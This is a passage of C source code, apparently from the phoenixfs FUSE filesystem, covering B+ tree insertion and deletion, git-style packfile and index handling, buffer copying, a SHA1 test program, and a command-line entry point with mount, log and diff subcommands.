for (++i, j = 0; i < order; i++, j++) {
new_node->pointers[j] = temp_pointers[i];
new_node->keys[j] = temp_keys[i];
new_node->num_keys++;
}
new_node->pointers[j] = temp_pointers[i];
free(temp_pointers);
free(temp_keys);
new_node->parent = old_node->parent;
for (i = 0; i <= new_node->num_keys; i++) {
child = new_node->pointers[i];
child->parent = new_node;
}
/*Insert a new key into the parent of the two
*nodes resulting from the split, with
*the old node to the left and the new to the right.
*/
return insert_into_parent(root, old_node, k_prime, new_node);
}
/*Inserts a new node (leaf or internal node) into the B+ tree.
*Returns the root of the tree after insertion.
*/
node *insert_into_parent(node *root, node *left, uint16_t key, node *right)
{
int left_index;
node *parent;
parent = left->parent;
/*Case: new root. */
if (parent == NULL)
return insert_into_new_root(left, key, right);
/*Case: leaf or node. (Remainder of
*function body.)
*/
/*Find the parent's pointer to the left
*node.
*/
left_index = get_left_index(parent, left);
/*Simple case: the new key fits into the node.
*/
if (parent->num_keys < order - 1)
return insert_into_node(root, parent, left_index, key, right);
/*Harder case: split a node in order
*to preserve the B+ tree properties.
*/
return insert_into_node_after_splitting(root, parent, left_index, key, right);
}
/*Creates a new root for two subtrees
*and inserts the appropriate key into
*the new root.
*/
node *insert_into_new_root(node *left, uint16_t key, node *right)
{
node *root = make_node();
root->keys[0] = key;
root->pointers[0] = left;
root->pointers[1] = right;
root->num_keys++;
root->parent = NULL;
left->parent = root;
right->parent = root;
return root;
}
/*First insertion:
*start a new tree.
*/
node *start_new_tree(uint16_t key, struct dir_record *pointer)
{
node *root = make_leaf();
root->keys[0] = key;
root->pointers[0] = pointer;
root->pointers[order - 1] = NULL;
root->parent = NULL;
root->num_keys++;
return root;
}
/*Master insertion function.
*Inserts a key and an associated value into
*the B+ tree, causing the tree to be adjusted
*however necessary to maintain the B+ tree
*properties.
*/
node *insert(node *root, uint16_t key, void *value)
{
struct dir_record *pointer;
node *leaf;
/*The current implementation ignores
*duplicates.
*/
if (find(root, key, false) != NULL)
return root;
/*Create a new record for the
*value.
*/
pointer = value;
/*Case: the tree does not exist yet.
*Start a new tree.
*/
if (root == NULL)
return start_new_tree(key, pointer);
/*Case: the tree already exists.
*(Rest of function body.)
*/
leaf = find_leaf(root, key, false);
/*Case: leaf has room for key and pointer.
*/
if (leaf->num_keys < order - 1) {
leaf = insert_into_leaf(leaf, key, pointer);
return root;
}
/*Case: leaf must be split.
*/
return insert_into_leaf_after_splitting(root, leaf, key, pointer);
}
// DELETION.
/*Utility function for deletion. Retrieves
*the index of a node's nearest neighbor (sibling)
*to the left if one exists. If not (the node
*is the leftmost child), returns -1 to signify
*this special case.
*/
int get_neighbor_index(node *n)
{
register int i;
/*Return the index of the key to the left
*of the pointer in the parent pointing
*to n.
*If n is the leftmost child, this means
*return -1.
*/
for (i = 0; i <= n->parent->num_keys; i++)
if (n->parent->pointers[i] == n)
return i - 1;
// Error state.
printf("Search for nonexistent pointer to node in parent.\n");
printf("Node: %#lx\n", (unsigned long)n);
exit(EXIT_FAILURE);
}
node *remove_entry_from_node(node *n, uint16_t key, node *pointer)
{
register int i, num_pointers;
// Remove the key and shift other keys accordingly.
i = 0;
while (n->keys[i] != key)
i++;
for (++i; i < n->num_keys; i++)
n->keys[i - 1] = n->keys[i];
// Remove the pointer and shift other pointers accordingly.
// First determine number of pointers.
num_pointers = n->is_leaf ? n->num_keys : n->num_keys + 1;
i = 0;
while (n->pointers[i] != pointer)
i++;
for (++i; i < num_pointers; i++)
n->pointers[i - 1] = n->pointers[i];
// One key fewer.
n->num_keys--;
// Set the other pointers to NULL for tidiness.
// A leaf uses the last pointer to point to the next leaf.
if (n->is_leaf)
for (i = n->num_keys; i < order - 1; i++)
n->pointers[i] = NULL;
else
for (i = n->num_keys + 1; i < order; i++)
n->pointers[i] = NULL;
return n;
}
node *adjust_root(node *root)
{
node *new_root;
/*Case: nonempty root.
*Key and pointer have already been deleted,
*so nothing to be done.
*/
if (root->num_keys > 0)
return root;
/*Case: empty root.
*/
// If it has a child, promote
// the first (only) child
// as the new root.
if (!root->is_leaf) {
new_root = root->pointers[0];
new_root->parent = NULL;
}
// If it is a leaf (has no children),
// then the whole tree is empty.
else
new_root = NULL;
free(root->keys);
free(root->pointers);
free(root);
return new_root;
}
/*Coalesces a node that has become
*too small after deletion
*with a neighboring node that
*can accept the additional entries
*without exceeding the maximum.
*/
node *coalesce_nodes(node *root, node *n, node *neighbor, int neighbor_index, int k_prime)
{
int neighbor_insertion_index, n_start, n_end, new_k_prime = 0;
node *tmp;
bool split;
register int i, j;
/*Swap neighbor with node if node is on the
*extreme left and neighbor is to its right.
*/
if (neighbor_index == -1) {
tmp = n;
n = neighbor;
neighbor = tmp;
}
/*Starting point in the neighbor for copying
*keys and pointers from n.
*Recall that n and neighbor have swapped places
*in the special case of n being a leftmost child.
*/
neighbor_insertion_index = neighbor->num_keys;
/*
*Nonleaf nodes may sometimes need to remain split,
*if the insertion of k_prime would cause the resulting
*single coalesced node to exceed the limit order - 1.
*The variable split is always false for leaf nodes
*and only sometimes set to true for nonleaf nodes.
*/
split = false;
/*Case: nonleaf node.
*Append k_prime and the following pointer.
*If there is room in the neighbor, append
*all pointers and keys from the neighbor.
*Otherwise, append only cut(order) - 2 keys and
*cut(order) - 1 pointers.
*/
if (!n->is_leaf) {
/*Append k_prime.
*/
neighbor->keys[neighbor_insertion_index] = k_prime;
neighbor->num_keys++;
/*Case (default): there is room for all of n's keys and pointers
*in the neighbor after appending k_prime.
*/
n_end = n->num_keys;
/*Case (special): k cannot fit with all the other keys and pointers
*into one coalesced node.
*/
n_start = 0; // Only used in this special case.
if (n->num_keys + neighbor->num_keys >= order) {
split = true;
n_end = cut(order) - 2;
}
for (i = neighbor_insertion_index + 1, j = 0; j < n_end; i++, j++) {
neighbor->keys[i] = n->keys[j];
neighbor->pointers[i] = n->pointers[j];
neighbor->num_keys++;
n->num_keys--;
n_start++;
}
/*The number of pointers is always
*one more than the number of keys.
*/
neighbor->pointers[i] = n->pointers[j];
/*If the nodes are still split, remove the first key from
*n.
*/
if (split) {
new_k_prime = n->keys[n_start];
for (i = 0, j = n_start + 1; i < n->num_keys; i++, j++) {
n->keys[i] = n->keys[j];
n->pointers[i] = n->pointers[j];
}
n->pointers[i] = n->pointers[j];
n->num_keys--;
}
/*All children must now point up to the same parent.
*/
for (i = 0; i < neighbor->num_keys + 1; i++) {
tmp = (node *)neighbor->pointers[i];
tmp->parent = neighbor;
}
}
/*In a leaf, append the keys and pointers of
*n to the neighbor.
*Set the neighbor's last pointer to point to
*what had been n's right neighbor.
*/
else {
for (i = neighbor_insertion_index, j = 0; j < n->num_keys; i++, j++) {
neighbor->keys[i] = n->keys[j];
neighbor->pointers[i] = n->pointers[j];
neighbor->num_keys++;
}
neighbor->pointers[order - 1] = n->pointers[order - 1];
}
if (!split) {
root = delete_entry(root, n->parent, k_prime, n);
free(n->keys);
free(n->pointers);
free(n);
}
else
for (i = 0; i < n->parent->num_keys; i++)
if (n->parent->pointers[i + 1] == n) {
n->parent->keys[i] = new_k_prime;
break;
}
return root;
}
/*Redistributes entries between two nodes when
*one has become too small after deletion
*but its neighbor is too big to append the
*small node's entries without exceeding the
*maximum
*/
node *redistribute_nodes(node *root, node *n, node *neighbor, int neighbor_index,
int k_prime_index, int k_prime)
{
register int i;
node *tmp;
/*Case: n has a neighbor to the left.
*Pull the neighbor's last key-pointer pair over
*from the neighbor's right end to n's left end.
*/
if (neighbor_index != -1) {
if (!n->is_leaf)
n->pointers[n->num_keys + 1] = n->pointers[n->num_keys];
for (i = n->num_keys; i > 0; i--) {
n->keys[i] = n->keys[i - 1];
n->pointers[i] = n->pointers[i - 1];
}
if (!n->is_leaf) {
n->pointers[0] = neighbor->pointers[neighbor->num_keys];
tmp = (node *)n->pointers[0];
tmp->parent = n;
neighbor->pointers[neighbor->num_keys] = NULL;
n->keys[0] = k_prime;
n->parent->keys[k_prime_index] = neighbor->keys[neighbor->num_keys - 1];
}
else {
n->pointers[0] = neighbor->pointers[neighbor->num_keys - 1];
neighbor->pointers[neighbor->num_keys - 1] = NULL;
n->keys[0] = neighbor->keys[neighbor->num_keys - 1];
n->parent->keys[k_prime_index] = n->keys[0];
}
}
/*Case: n is the leftmost child.
*Take a key-pointer pair from the neighbor to the right.
*Move the neighbor's leftmost key-pointer pair
*to n's rightmost position.
*/
else {
if (n->is_leaf) {
n->keys[n->num_keys] = neighbor->keys[0];
n->pointers[n->num_keys] = neighbor->pointers[0];
n->parent->keys[k_prime_index] = neighbor->keys[1];
}
else {
n->keys[n->num_keys] = k_prime;
n->pointers[n->num_keys + 1] = neighbor->pointers[0];
tmp = (node *)n->pointers[n->num_keys + 1];
tmp->parent = n;
n->parent->keys[k_prime_index] = neighbor->keys[0];
}
for (i = 0; i < neighbor->num_keys; i++) {
neighbor->keys[i] = neighbor->keys[i + 1];
neighbor->pointers[i] = neighbor->pointers[i + 1];
}
if (!n->is_leaf)
neighbor->pointers[i] = neighbor->pointers[i + 1];
}
/*n now has one more key and one more pointer;
*the neighbor has one fewer of each.
*/
n->num_keys++;
neighbor->num_keys--;
return root;
}
/*Deletes an entry from the B+ tree.
*Removes the record and its key and pointer
*from the leaf, and then makes all appropriate
*changes to preserve the B+ tree properties.
*/
node *delete_entry(node *root, node *n, uint16_t key, void *pointer)
{
int min_keys;
node *neighbor;
int neighbor_index;
int k_prime_index, k_prime;
int capacity;
// Remove key and pointer from node.
n = remove_entry_from_node(n, key, pointer);
/*Case: deletion from the root.
*/
if (n == root)
return adjust_root(root);
/*Case: deletion from a node below the root.
*(Rest of function body.)
*/
/*Determine minimum allowable size of node,
*to be preserved after deletion.
*/
min_keys = n->is_leaf ? cut(order - 1) : cut(order) - 1;
/*Case: node stays at or above minimum.
*(The simple case.)
*/
if (n->num_keys >= min_keys)
return root;
/*Case: node falls below minimum.
*Either coalescence or redistribution
*is needed.
*/
/*Find the appropriate neighbor node with which
*to coalesce.
*Also find the key (k_prime) in the parent
*between the pointer to node n and the pointer
*to the neighbor.
*/
neighbor_index = get_neighbor_index (n);
k_prime_index = neighbor_index == -1 ? 0 : neighbor_index;
k_prime = n->parent->keys[k_prime_index];
neighbor = neighbor_index == -1 ? n->parent->pointers[1] :
n->parent->pointers[neighbor_index];
capacity = n->is_leaf ? order : order - 1;
/*Coalescence. */
if (neighbor->num_keys + n->num_keys < capacity)
return coalesce_nodes(root, n, neighbor, neighbor_index, k_prime);
/*Redistribution. */
else
return redistribute_nodes(root, n, neighbor, neighbor_index, k_prime_index, k_prime);
}
node *delete(node *root, uint16_t key)
{
node *key_leaf;
struct dir_record *key_record;
key_record = find(root, key, false);
key_leaf = find_leaf(root, key, false);
if (key_record != NULL && key_leaf != NULL) {
root = delete_entry(root, key_leaf, key, key_record);
free(key_record);
}
return root;
}
void destroy_tree(node *root)
{
register int i;
if (root->is_leaf)
for (i = 0; i < root->num_keys; i++)
free(root->pointers[i]);
else
for (i = 0; i < root->num_keys + 1; i++)
destroy_tree(root->pointers[i]);
free(root->pointers);
free(root->keys);
free(root);
}
<|start_filename|>fuse.h<|end_filename|>
#ifndef FUSE_H_
#define FUSE_H_
#define FUSE_USE_VERSION 26
#define _XOPEN_SOURCE 500
#define PHOENIXFS_MAGIC 0x2888
#define DT_DIR 4
#include <sys/stat.h>
#include <unistd.h>
#include <time.h>
#include <stdio.h>
#include <fuse.h>
#include "common.h"
#include "sha1.h"
#include "buffer.h"
#include "btree.h"
#include "fstree.h"
#include "compress.h"
#include "pack.h"
int phoenixfs_fuse(int argc, char *argv[]);
#define ROOTENV ((struct env_t *) fuse_get_context()->private_data)
#endif
<|start_filename|>persist.h<|end_filename|>
#ifndef PERSIST_H_
#define PERSIST_H_
#include "common.h"
#include "btree.h"
#include <stdio.h>
void dump_dr_tree(struct node *root, FILE *outfile);
struct node *load_dr_tree(FILE *infile);
/* From fstree.c */
struct dir_record *make_dr(const char *path);
struct vfile_record *make_vfr(const char *path);
#endif
<|start_filename|>buffer.h<|end_filename|>
#ifndef BUFFER_H_
#define BUFFER_H_
#include <stdio.h>
#include <unistd.h>
#define CHUNK 16384
off_t buffer_skip_bytes(FILE *src, off_t size);
off_t buffer_copy_bytes(FILE *src, FILE *dst, size_t size);
#endif
<|start_filename|>loose.c<|end_filename|>
#include "loose.h"
#include <limits.h>
#include <stdlib.h>
#include <string.h>
#include <stdbool.h>
#include <sys/stat.h>
struct loose_buf looseroot = {0, NULL};
static char xpath[PATH_MAX];
void add_loose_entry(const unsigned char *sha1, size_t size)
{
uint32_t this_nr;
char sha1_digest[40];
this_nr = looseroot.nr;
print_sha1(sha1_digest, sha1);
looseroot.entries = realloc(looseroot.entries, (this_nr + 1) *
sizeof(struct pack_idx_entry *));
PHOENIXFS_DBG("add_loose_entry:: %s [%d]", sha1_digest, this_nr);
looseroot.entries[this_nr] = malloc(sizeof(struct pack_idx_entry));
memset(looseroot.entries[this_nr], 0, (sizeof(struct pack_idx_entry)));
memcpy(looseroot.entries[this_nr]->sha1, sha1, 20);
looseroot.entries[this_nr]->size = size;
looseroot.nr ++;
}
/**
* Format:
* <> = [sha1 | delta_bit | size | data]
*/
void packup_loose_objects(FILE *packfh, const void *idx_data,
uint32_t idx_nr, const char *loosedir)
{
register int i;
FILE *datafh;
struct stat st;
bool delta = false;
char sha1_digest[40];
struct pack_idx_entry *this_entry;
/* For parsing out existing data in idx_map */
void *sha1_offset;
unsigned char this_sha1[20];
off_t this_offset;
int existing_nr;
/* Don't unnecessarily rewrite the index */
if (idx_data && !looseroot.nr) {
PHOENIXFS_DBG("packup_loose_objects:: Not rewriting idx");
return;
}
/* Write packfile and idx */
fseek(packfh, 0L, SEEK_END);
for (i = 0; i < looseroot.nr; i++) {
this_entry = looseroot.entries[i];
/* Set the offset for writing packfile index */
this_entry->offset = ftell(packfh);
/* Write the SHA1 */
fwrite(this_entry->sha1, 20, 1, packfh);
/* Write delta bit */
/* TODO: Generate real deltas! */
fwrite(&delta, sizeof(bool), 1, packfh);
/* Write the zlib stream or delta */
print_sha1(sha1_digest, this_entry->sha1);
sprintf(xpath, "%s/%s", loosedir, sha1_digest);
if ((lstat(xpath, &st) < 0) ||
!(datafh = fopen(xpath, "rb"))) {
PHOENIXFS_DBG("packup_loose_objects:: Creating %s", sha1_digest);
datafh = fopen(xpath, "wb");
}
PHOENIXFS_DBG("packup_loose_objects:: %s [%d] %lld", sha1_digest,
i, (long long int)this_entry->offset);
fwrite(&(st.st_size), sizeof(off_t), 1, packfh);
buffer_copy_bytes(datafh, packfh, st.st_size);
fclose(datafh);
}
/* If there is no pre-existing idx, just write the new idx */
if (!idx_data) {
unmap_write_idx(looseroot.entries, looseroot.nr);
return;
}
/* Update index */
/* First, add entries from the existing idx_data */
/* Skip header and fanout table */
sha1_offset = (void *) (idx_data + 8 + 256 * 4);
existing_nr = looseroot.nr;
for (i = 0; i < idx_nr; i++) {
memcpy(&this_sha1, sha1_offset, 20);
print_sha1(sha1_digest, this_sha1);
add_loose_entry(this_sha1, 0);
if (!(this_offset = find_pack_entry(this_sha1)))
PHOENIXFS_DBG("packup_loose_objects:: "
"update idx missing %s", sha1_digest);
looseroot.entries[i + existing_nr]->offset = this_offset;
sha1_offset += 20 * sizeof(unsigned char);
}
/* Write the new entries */
/* Finally, rewrite the idx */
unmap_write_idx(looseroot.entries, looseroot.nr);
}
<|start_filename|>main.c<|end_filename|>
#include "main.h"
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <limits.h>
#include <sys/stat.h>
static char path_buf[PATH_MAX] = "\0";
static void subcmd_diff(const char *pathspec1, const char *pathspec2)
{
FILE *file1, *file2;
struct stat st1, st2;
if ((stat(pathspec1, &st1) < 0) ||
(!(file1 = fopen(pathspec1, "rb"))))
die("Could not open %s: %d", pathspec1, -errno);
if ((stat(pathspec2, &st2) < 0) ||
(!(file2 = fopen(pathspec2, "rb"))))
die("Could not open %s: %d", pathspec2, -errno);
phoenixfs_diff(file1, st1.st_size, file2, st2.st_size, stdout);
fclose(file1);
fclose(file2);
}
static void subcmd_log(const char *path)
{
int rev;
FILE *infile;
struct tm *t;
struct stat st;
static char date_buf[DATE_LEN];
static char mode_buf[20];
for (rev = 0; ; rev++) {
sprintf(path_buf, "%s@%d", path, rev);
if ((stat(path_buf, &st) < 0) ||
(!(infile = fopen(path_buf, "rb"))))
break;
/* Write header */
rev ? printf("Revn:\tHEAD -%d\n", rev) : printf("Revn:\tHEAD\n");
t = localtime(&st.st_mtime);
strftime(date_buf, DATE_LEN, "%a, %d %b %Y %T", t);
printf("Date:\t%s\n", date_buf);
printf("Size:\t%lld bytes\n", (long long int)st.st_size);
switch(st.st_mode) {
case S_IFREG | 0755:
strcpy(mode_buf, "Executable file");
break;
case S_IFLNK | 0644:
strcpy(mode_buf, "Symbolic link");
break;
default:
strcpy(mode_buf, "Regular file");
break;
}
printf("Mode:\t%s\n\n", mode_buf);
/* Write contents */
buffer_copy_bytes(infile, stdout, st.st_size);
printf("\n\n");
fclose(infile);
};
}
static void usage(const char *progname, enum subcmd cmd)
{
switch (cmd) {
case SUBCMD_NONE:
die("Usage: %s <subcommand> [arguments ...]", progname);
case SUBCMD_MOUNT:
die("Usage: %s mount <gitdir> <mountpoint>", progname);
case SUBCMD_LOG:
die("Usage: %s log <filename>", progname);
case SUBCMD_DIFF:
die("Usage: %s diff <pathspec1> <pathspec2>", progname);
default:
die("Which subcommand?");
}
}
int main(int argc, char *argv[])
{
if ((getuid() == 0) || (geteuid() == 0))
die("Running phoenixfs as root opens unnacceptable security holes");
if (argc < 2)
usage(argv[0], SUBCMD_NONE);
/* Subcommand dispatch routine */
if (!strncmp(argv[1], "mount", 5)) {
if (argc < 3)
usage(argv[0], SUBCMD_MOUNT);
return phoenixfs_fuse(argc, argv);
} else if (!strncmp(argv[1], "log", 3)) {
if (argc < 2)
usage(argv[0], SUBCMD_LOG);
subcmd_log(argv[2]);
}
else if (!strncmp(argv[1], "diff", 4)) {
if (argc < 4)
usage(argv[0], SUBCMD_DIFF);
subcmd_diff(argv[2], argv[3]);
}
else
usage(argv[0], SUBCMD_NONE);
return 0;
}
<|start_filename|>buffer.c<|end_filename|>
#include "buffer.h"
#include <stdio.h>
#include <unistd.h>
static unsigned char buf[CHUNK];
off_t buffer_skip_bytes(FILE *src, off_t size)
{
size_t in;
off_t done = 0;
while (done < size && !feof(src) && !ferror(src)) {
in = (size - done) < CHUNK ? (size - done) : CHUNK;
done += fread(buf, 1, in, src);
}
return done;
}
off_t buffer_copy_bytes(FILE *src, FILE *dst, size_t size)
{
size_t in;
off_t done = 0;
while (done < size && !feof(src) && !ferror(src)) {
in = (size - done) < CHUNK ? (size - done) : CHUNK;
in = fread(buf, 1, in, src);
if (ferror(src) || feof(src))
return done + in;
done += in;
fwrite(buf, 1, in, dst);
if (ferror(dst) || feof(dst))
return done + buffer_skip_bytes(src, size - done);
}
return done;
}
<|start_filename|>t/test-sha1.c<|end_filename|>
#include "sha1.h"
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/stat.h>
static void usage(const char *progname)
{
die("Usage: %s <file>", progname);
}
int main(int argc, char* argv[])
{
FILE *infile;
unsigned char sha1[20];
char sha1_digest[40];
struct stat st;
if (argc < 2)
usage(argv[0]);
if (!(infile = fopen(argv[1], "rb")))
die("Could not open %s", argv[1]);
if (stat(argv[1], &st) < 0)
die("Could not stat %s", argv[1]);
if (sha1_file(infile, st.st_size, sha1) < 0)
die("SHA1 failed");
fclose(infile);
print_sha1(sha1_digest, sha1);
printf("%s\n", sha1_digest);
return 0;
}
<|start_filename|>compress.h<|end_filename|>
#ifndef COMPRESS_H_
#define COMPRESS_H_
#include <stdio.h>
#include "common.h"
#include "buffer.h"
int zdeflate(FILE *source, FILE *dest, int level);
int zinflate(FILE *source, FILE *dest);
#endif
<|start_filename|>crc32.h<|end_filename|>
#ifndef CRC32_H_
#define CRC32_H_
#include "common.h"
#include <stdint.h>
#include <unistd.h>
uint32_t compute_crc32(uint32_t crc, const uint8_t *data, size_t length);
#endif
<|start_filename|>loose.h<|end_filename|>
#ifndef LOOSE_H_
#define LOOSE_H_
#include "common.h"
#include "buffer.h"
#include "sha1.h"
#include <stdio.h>
#include <unistd.h>
#include <stdint.h>
#include <stdlib.h>
struct pack_idx_entry {
unsigned char sha1[20];
off_t offset;
size_t size;
};
struct loose_buf {
uint32_t nr;
struct pack_idx_entry **entries;
};
void add_loose_entry(const unsigned char *sha1, size_t size);
void packup_loose_objects(FILE *packfh, const void *idx_data,
uint32_t idx_nr, const char *loosedir);
void unmap_write_idx(struct pack_idx_entry *objects[], int nr_objects);
off_t find_pack_entry(const unsigned char *sha1);
#endif
<|start_filename|>pack.c<|end_filename|>
#include "pack.h"
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <errno.h>
#include <assert.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <arpa/inet.h>
static struct packed_git packroot;
static bool loaded_pack = false;
/* ---- Pack Lookup ---- */
/**
* Note:
* The CRC checksum table has been omitted
*/
static off_t nth_packed_object_offset(uint32_t n)
{
const unsigned char *index = packroot.idx_data;
uint32_t off;
index += 4 * 256;
index += 8 + packroot.nr * 20;
off = ntohl(*((uint32_t *)(index + 4 * n)));
if (!(off & 0x80000000))
return off;
index += packroot.nr * 4 + (off & 0x7fffffff) * 8;
return (((uint64_t)ntohl(*((uint32_t *)(index + 0)))) << 32) |
ntohl(*((uint32_t *)(index + 4)));
}
static int sha1_entry_pos(const void *table,
size_t elem_size,
size_t key_offset,
unsigned lo, unsigned hi, unsigned nr,
const unsigned char *key)
{
const unsigned char *base = table;
const unsigned char *hi_key, *lo_key;
unsigned ofs_0;
if (!nr || lo >= hi)
return -1;
if (nr == hi)
hi_key = NULL;
else
hi_key = base + elem_size * hi + key_offset;
lo_key = base + elem_size * lo + key_offset;
ofs_0 = 0;
do {
int cmp;
unsigned ofs, mi, range;
unsigned lov, hiv, kyv;
const unsigned char *mi_key;
range = hi - lo;
if (hi_key) {
for (ofs = ofs_0; ofs < 20; ofs++)
if (lo_key[ofs] != hi_key[ofs])
break;
ofs_0 = ofs;
/*
* byte 0 thru (ofs-1) are the same between
* lo and hi; ofs is the first byte that is
* different.
*/
hiv = hi_key[ofs_0];
if (ofs_0 < 19)
hiv = (hiv << 8) | hi_key[ofs_0+1];
} else {
hiv = 256;
if (ofs_0 < 19)
hiv <<= 8;
}
lov = lo_key[ofs_0];
kyv = key[ofs_0];
if (ofs_0 < 19) {
lov = (lov << 8) | lo_key[ofs_0+1];
kyv = (kyv << 8) | key[ofs_0+1];
}
assert(lov < hiv);
if (kyv < lov)
return -1 - lo;
if (hiv < kyv)
return -1 - hi;
/*
* Even if we know the target is much closer to 'hi'
* than 'lo', if we pick too precisely and overshoot
* (e.g. when we know 'mi' is closer to 'hi' than to
* 'lo', pick 'mi' that is higher than the target), we
* end up narrowing the search space by a smaller
* amount (i.e. the distance between 'mi' and 'hi')
* than what we would have (i.e. about half of 'lo'
* and 'hi'). Hedge our bets to pick 'mi' less
* aggressively, i.e. make 'mi' a bit closer to the
* middle than we would otherwise pick.
*/
kyv = (kyv * 6 + lov + hiv) / 8;
if (lov < hiv - 1) {
if (kyv == lov)
kyv++;
else if (kyv == hiv)
kyv--;
}
mi = (range - 1) * (kyv - lov) / (hiv - lov) + lo;
if (!(lo <= mi && mi < hi))
die("assertion failure lo %u mi %u hi %u",
lo, mi, hi);
mi_key = base + elem_size * mi + key_offset;
cmp = memcmp(mi_key + ofs_0, key + ofs_0, 20 - ofs_0);
if (!cmp)
return mi;
if (cmp > 0) {
hi = mi;
hi_key = mi_key;
} else {
lo = mi + 1;
lo_key = mi_key + elem_size;
}
} while (lo < hi);
return -lo-1;
}
off_t find_pack_entry(const unsigned char *sha1)
{
const uint32_t *fanout = packroot.idx_data;
const unsigned char *sha1_idx = packroot.idx_data;
unsigned hi, lo, stride;
char sha1_digest[40];
int pos;
/* Skip the header and go to the SHA1 section */
fanout += 2;
sha1_idx += 8;
sha1_idx += 4 * 256;
hi = ntohl(fanout[*sha1]);
lo = ((*sha1 == 0x0) ? 0 : ntohl(fanout[*sha1 - 1]));
stride = 20;
print_sha1(sha1_digest, sha1);
PHOENIXFS_DBG("find_pack_entry:: %s %u %u %u", sha1_digest,
lo, hi, packroot.nr);
pos = sha1_entry_pos(sha1_idx, stride, 0,
lo, hi, packroot.nr, sha1);
PHOENIXFS_DBG("find_pack_entry:: pos = %d", pos);
if (pos < 0)
return 0;
return nth_packed_object_offset(pos);
}
/**
* Format:
* <> = [sha1 | delta_bit | size | data]
*/
int unpack_entry(unsigned char *sha1, const char *loosedir)
{
unsigned char read_sha1[20];
off_t obj_offset, size;
char sha1_digest[40];
char xpath[PATH_MAX];
FILE *loosefh;
bool delta;
print_sha1(sha1_digest, sha1);
/* Convert SHA1 to offset and make sure we were successful */
if (!(obj_offset = find_pack_entry(sha1))) {
PHOENIXFS_DBG("unpack_entry:: missing %s", sha1_digest);
return -1;
}
PHOENIXFS_DBG("unpack_entry:: %s %lld", sha1_digest,
(long long int)obj_offset);
if (fseek(packroot.packfh, obj_offset, SEEK_SET) < 0)
die("Seek error: packroot.packfh");
if (fread(&read_sha1, 20 * sizeof(unsigned char), 1, packroot.packfh) < 1)
die("Read error: read_sha1");
assert(memcmp(sha1, read_sha1, 20) == 0);
if (fread(&delta, sizeof(bool), 1, packroot.packfh) < 1)
die("Read error: delta");
sprintf(xpath, "%s/%s", loosedir, sha1_digest);
if (!(loosefh = fopen(xpath, "wb+"))) {
PHOENIXFS_DBG("unpack_entry:: can't open %s", xpath);
return -errno;
}
if (!delta) {
if (fread(&size, sizeof(off_t), 1, packroot.packfh) < 1)
die("Read error: %lld", (long long int)size);
PHOENIXFS_DBG("unpack_entry:: non-delta %s", sha1_digest);
buffer_copy_bytes(packroot.packfh, loosefh, size);
}
else
PHOENIXFS_DBG("unpack_entry:: delta %s", sha1_digest);
fclose(loosefh);
return 0;
}
/* ---- Pack Read ---- */
int map_pack_idx(FILE *src)
{
int srcfd;
void *idx_map;
size_t idx_size;
uint32_t n, nr, i, *index;
struct stat st;
struct pack_idx_header *hdr;
if ((srcfd = fileno(src)) < 0)
return -errno;
fstat(srcfd, &st);
idx_size = st.st_size;
if (idx_size < 4 * 256) {
close(srcfd);
die("Pack index too small");
}
idx_map = mmap(NULL, idx_size, PROT_READ, MAP_PRIVATE, srcfd, 0);
close(srcfd);
fclose(src);
hdr = idx_map;
if (hdr->signature != htonl(PACK_IDX_SIGNATURE)) {
munmap(idx_map, idx_size);
die("Corrupt pack index signature");
}
else if (hdr->version != htonl(PACK_IDX_VERSION)) {
munmap(idx_map, idx_size);
die("Wrong pack index version");
}
index = (uint32_t *) hdr + 2;
for (i = 0, nr = 0; i < 256; i++) {
n = ntohl(index[i]);
if (n < nr) {
munmap(idx_map, idx_size);
die("Non-monotonic index");
}
nr = n;
}
/*
* Minimum size:
* - 8 bytes of header
* - 256 index entries 4 bytes each
* - 20-byte sha1 entry * nr
* - 4-byte offset entry * nr
*
* Omitted fields:
* - 4-byte crc entry * nr
* - 20-byte SHA1 of the packfile
* - 20-byte SHA1 file checksum
*/
unsigned long min_size = 8 + 4*256 + nr*(20 + 4);
unsigned long max_size = min_size;
if (nr)
max_size += (nr - 1) * 8;
if (idx_size < min_size || idx_size > max_size) {
munmap(idx_map, idx_size);
die("Wrong packfile index file size");
}
if (idx_size != min_size && (sizeof(off_t) <= 4)) {
munmap(idx_map, idx_size);
die("Pack too large for current definition of off_t");
}
packroot.idx_data = idx_map;
packroot.idx_size = idx_size;
packroot.nr = nr;
return 0;
}
static int load_pack_idx(const char *path)
{
FILE *idx_file;
if (packroot.idx_data)
return -1;
if (!(idx_file = fopen(path, "rb")))
return -errno;
return map_pack_idx(idx_file);
}
int load_packing_info(const char *pack_path, const char *idx_path,
bool existing_pack)
{
struct stat st;
struct pack_header hdr;
PHOENIXFS_DBG("load_packing_info:: %s %s %d", pack_path, idx_path, existing_pack);
if (!(loaded_pack = existing_pack)) {
/* Nothing to load */
strcpy(packroot.pack_path, pack_path);
strcpy(packroot.idx_path, idx_path);
return 0;
}
if (load_pack_idx(idx_path) < 0)
die("Packfile index %s missing", idx_path);
if (!(packroot.packfh = fopen(pack_path, "ab+")) ||
(stat(pack_path, &st) < 0))
die("Can't open pack %s", pack_path);
packroot.pack_size = st.st_size;
strcpy(packroot.pack_path, pack_path);
strcpy(packroot.idx_path, idx_path);
/*
* Minimum size:
* - 8 bytes of header
*
* Omitted fields:
* - 4 bytes of entries
* - 20-byte packfile SHA1 checksum
*/
if (packroot.pack_size < 8)
die("Wrong packfile file size");
/* Verify we recognize this pack file format */
rewind(packroot.packfh);
if (fread(&hdr, sizeof(hdr), 1, packroot.packfh) < 1)
die("Read error: hdr");
if (hdr.signature != htonl(PACK_SIGNATURE))
die("Corrupt pack signature: %d", ntohl(hdr.signature));
if (hdr.version != htonl(PACK_VERSION))
die("Wrong pack version: %d", ntohl(hdr.version));
fseek(packroot.packfh, 0L, SEEK_END);
/* Omit entries */
return 0;
}
/* ---- Pack Write ---- */
static int sha1_compare(const void *_a, const void *_b)
{
struct pack_idx_entry *a = *(struct pack_idx_entry **)_a;
struct pack_idx_entry *b = *(struct pack_idx_entry **)_b;
return memcmp(a->sha1, b->sha1, 20);
}
void unmap_write_idx(struct pack_idx_entry **objects, int nr_objects)
{
struct pack_idx_entry **sorted_by_sha, **list, **last;
unsigned int nr_large_offset;
struct pack_idx_header hdr;
off_t last_obj_offset = 0;
char sha1_digest[40];
uint32_t array[256];
register int i;
FILE *idxfh;
